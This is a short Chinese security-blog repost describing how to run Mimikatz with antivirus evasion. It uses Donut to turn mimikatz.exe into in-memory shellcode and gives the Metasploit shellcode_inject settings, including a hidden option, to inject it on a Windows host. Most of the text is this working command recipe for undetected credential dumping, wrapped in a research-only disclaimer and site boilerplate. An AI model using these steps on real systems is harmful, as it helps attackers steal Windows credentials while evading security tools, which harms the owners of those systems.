MSF加载Minikatz免杀

admin 2023年10月5日01:04:12评论90 views字数 446阅读1分29秒阅读模式

MSF加载Minikatz免杀

在人生的道路上,每个人都是孤独的旅客。
--季羡林

Donut 是一个与位置无关的工具,支持在内存中执行 VBScript、JScript、EXE、DLL 文件和 dotNET 程序集。Donut 创建的模块可以从 HTTP 服务器暂存,也可以直接嵌入到加载器本身中。可以选择使用 Chaskey 块密码和随机生成的 128 位密钥对模块进行加密。在内存中加载并执行文件后,将擦除原始引用以阻止内存扫描程序。
提取mimikatz.bin

./donut -f mimikatz.exe -o mimikatz.bin

MSF加载Minikatz免杀

设置MSF

  • use post/windows/manage/shellcode_injectset SHELLCODE /root/tools/noterce/mimikatz.binset CHANNELIZED trueset INTERACTIVE trueset HIDDEN true

    MSF加载Minikatz免杀

    https://github.com/TheWover/donut

    原文始发于微信公众号(Enginge):MSF加载Minikatz免杀

    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2023年10月5日01:04:12
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     MSF加载Minikatz免杀https://cn-sec.com/archives/2086104.html
                    免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    发表评论

    匿名网友 填写信息